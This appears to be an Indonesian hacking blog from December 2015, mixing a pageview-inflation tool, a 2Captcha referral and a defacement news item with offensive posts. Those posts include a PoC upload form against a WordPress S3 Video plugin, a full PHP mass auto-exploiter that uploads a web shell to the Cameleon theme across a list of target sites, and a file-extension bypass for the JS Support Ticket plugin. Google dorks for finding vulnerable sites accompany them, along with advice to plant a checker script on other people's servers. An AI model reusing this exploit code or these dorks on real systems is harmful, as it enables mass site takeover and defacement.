Selasa, 22 Desember 2015

Multi Auto PageViews Blog

Halo Gan .. udah lama gak nulis postingan lagi nih heheh :D kali ini saya akan membagikan tools yang bisa dibilang Auto Visitor Blog / Auto Page Views atau semacemnya deh. Nah tools ini beda dari yang biasa kita sebut dengan Jingling (Bot buatan cina) bedanya dimana ? nah tools ini sebenernya hanya membuka multi page blog kita, jadi visitornya itu kita kita juga :D saya sarankan untuk menggunakan tools ini pakailah vpn. Itung itung biar keliatan beda ipnya. 

* Btw jangan digangbang ya ..

Check it out ! Here

Senin, 14 Desember 2015

Vuln Or Not Checker !




#- Title : Vuln Or Not Checker !
#- Coded By : rEd X
#- Team : 3xp1r3 Cyber Army
#- Extension : Php
#- Using this Tool >> Upload To Web than Executed !
======================================================================================
Assalamualaikum Wr. Wb.

Vuln Or Not
Pada kesempatan ini saya akan membagikan script Vuln or not Checker yang dibuat oleh rEd X dari 3xp1r3 Team. Tau sendiri kan script ini digunakan untuk mengetes web itu vuln atau engga. Kerja Script ini sebenernya sama kek "preg_match" semacam menemukan string. Maka dari itu script ini bisa digunakan untuk Vuln Or Not Checker.

Deface Or Not Checker 
Selain Sebagai Vuln Checker script ini juga bisa digunakan untuk mengecek kedepes apa engga. cara kerja script ini sama kayak diatas. 

Kegunaan
Script ini sangat berguna buat kamu yang sedang hoki mendapat Mass Deface / Sabun masal ( Nama keren ) nah daripada tangan kamu pegel buka satu satu mendingan langsung pake script ini aja. langsung kedeteksi, itu web ke depes apa engga sama halnya dengan vuln checker misalnya kamu dapet banyak target nih, nah pegel kan ngecek satu satu itu vuln apa engga. mendingan pake script ini deh biar gak pegel wkwk :v

Cara Pakainya Bijimana ?
Cara pakainya sangat mudah, kamu tinggal upload saja diweb, entah web siapa nah tinggal buka deh. abis itu masukin deh list webnya. Ada perbedaan jika memasukan list web untuk Vuln & Depes checker seperti ini :

++ Depes Checker ++




++ Vuln Checker ++



Tau Sendiri kan perbedaannya dimana ? 

Note : 
Untuk Vuln Checker, Jika Vulnnya "Blank" seperti uploadify sepertinya script ini tidak akan bekerja.


Scriptnya Disini




Sabtu, 12 Desember 2015

2Captcha.com Ngetik Captcha Bisa Dapet Duit Gan !


Assalamualaikum Wr. Wb

Kali ini saya akan memberitahu tentang website yang isinya itu Captcha tapi kita bisa dapet duit. web tersebut namanya 2Captcha.com

2Capthca.com adalah layanan pengenalan gambar yang digerakan oleh manusia dan Provider pemecahan CAPTCHA. Ini adalah layanan bagi mereka yang membutuhkan gambar yang diakui secara real time dan mereka yang siap untuk mengambil pekerjaan ini.

 Untuk memulai pekerjaan ini, Kamu akan disuruh daftar akun jika sudah kamu bisa memulainya dengan cara klik Start Work. Lalu Klik Start dan kamu tinggal ketik deh Capcaynya. semakin kamu banyak memecahkan capcay $ kamu juga akan semakin bertambah

Oh iya, 2Captcha menyajikan beberapa alternatif Payout yaitu dengan WebMoney, Paypal Dan Payza. Pekerjaan ini bisa digunakan untuk mengisi waktu luang juga loh :D

Jika kamu berminat Silahkan Daftar Disini !

Jumat, 11 Desember 2015

WordPress Plugins S3 Video Remote Shell Upload


#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 
/wp-content/plugins/s3-video/includes/uploadify.php

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:
Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>


Shell Path : Here !!


Senin, 07 Desember 2015

Situs Ganool Di Hack



 Sekitar satu jam yang lalu Web Nonton Film Gratis yang populer yaitu Ganool Di Retas oleh seorang hacker berkebangsaan Turki yaitu iSKORPiTX. 

Ketika saya ingin membuka web Ganool.ag muncul hal yang tidak seperti biasanya. saat itu tampilan ada background hitam dengan ditengah terdapat foto bendera turkey dengan seorang pahlawan didalam bendera tersebut, lalu dibawahnya terpampang tulisan " By iSKORPiTX" yang menunjukan bahwa dia berasal dari turkey. Lalu dipaling bawah ada tulisan salam untuk seluruh dunia.

Setelah beberapa waktu kemudian, saya mencoba mengakses kembali ternyata tampilan diatas sudah berubah menjadi seperti dibawah ini .


Saya tidak tahu method apa yang digunakan oleh iSKORPiTX ini. Karena informasi ini masih simpang siur. Bahkan di zone-h pun tidak ada mirrornya.

Sekian & Terimanasi_

WordPress Chameleon Auto exploiter




#- Title : WordPress Chameleon Auto exploiter
#- Coded By : kkk1337
#- Team : Umbrella Security
#- Extension : Php
#- Using this Tool >> php file.php list.txt
#- Example >> file.php = This file name | list.txt = your list target


<?php 


// Coded by KkK1337

// Greetz to: Condor8

// fb: https://www.facebook.com/Cracker1337

// pastebin: http://pastebin.com/u/KkK1337

// don't change rights


echo "chameleon auto-exploiter by KkK1337";


$x=file($argv[1]);

foreach ($x as $sites){
$sites=trim($sites);
$uploadfile="credits.phtml";
$ch = curl_init("$sites/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$waw = curl_exec($ch);
curl_close($ch);

if(preg_match("/success/i",$waw)){

print "shell uploaded : $sites \n";
$u="$sites/wp-content/uploads/2014/10/credits.phtml"; // Change year and month. Year: 2014 , Month: 10
$ux = "".$u."\r\n"; $save=fopen('new.txt','ab'); fwrite($save,"$ux");

}

else{

echo "Not vuln : $sites\n";

}

}


?>

Sabtu, 05 Desember 2015

Wordpress "Js Support Ticket" File Upload Bypass Extensions




#-Title: Wordpress "Js Support Ticket" File Upload Bypass Extensions
#-Author: Mgm-Eg
#-Contact : ask.fm/m1g1m
#-Date: 2015-12-05
#-Link Download : wordpress. org/plugins/js-support-ticket/
#-Google Dork: inurl:wp-content/plugins/js-support-ticket/
#-Tested on : Windows, Linux
#-Fixed in : ??

////////////////////////////////////////////////////////////////////////////////////////////

Description : 
When you open ticket you can upload Attachments only file Extenssion Type :
Doc, Docx, odt, pdf, txt, png, jpeg, jpg
But you can bypass it and upload another extensions


Solution:
Upgrade to New version

-- Proof Of Concept --

1. Use Notepad++ open new file ,

Add
[ GIF89a;


<?php phpinfo(); ?> #you can replace this code to your code

]

2. " save file as test.jpg "
3. Open ticket page and Complete the required fields , and upload your [test.jpg]




Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"

example :
-----------------------------319722301512393rn
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"rn
Content-Type: image/jpegrn
rn
rn
<?php phpinfo(); ?>rn
-----------------------------319722301512393rn




Shell Path :

*Note 
also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .